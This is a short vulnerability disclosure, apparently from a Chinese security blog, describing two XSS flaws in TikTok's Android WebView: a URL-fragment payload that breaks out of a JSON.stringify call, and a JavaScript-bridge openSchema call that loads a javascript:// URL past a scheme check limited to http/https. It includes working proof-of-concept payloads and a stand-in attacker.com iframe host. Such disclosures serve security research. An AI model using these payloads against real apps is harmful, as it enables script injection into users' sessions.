安卓版TikTok_XSS漏洞_en

# 安卓版TikTok XSS漏洞/en

==Generic XSS on TikTok WebView==

https://m.tiktok.com/falcon/#'),alert(1));//

The following execution will be triggered:

JSON.stringify(window.performance.getEntriesByName('https://m.tiktok.com/falcon/#'),alert(1));//'))

==Add Wiki Activity的另一個XSS==
Add Wiki Activity implements URL verification to ensure that URLs in the blacklist will not be opened in it. But the verification is only carried out in the http or https scheme. Because they believe that other programs are invalid and do not need to be verified.

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a(“AbsSecStrategy”, “needBuildSecLink : url is invalid.”);
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith(“http”)) || (arg1.startsWith(“https”))) && !e.a(arg1);
}

Even if the verification is not based on the javascript solution, this solution can also be used to perform XSS attacks on the WebView.

window.ToutiaoJSBridge.invokeMethod(JSON.stringify({
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
},
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
}));
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容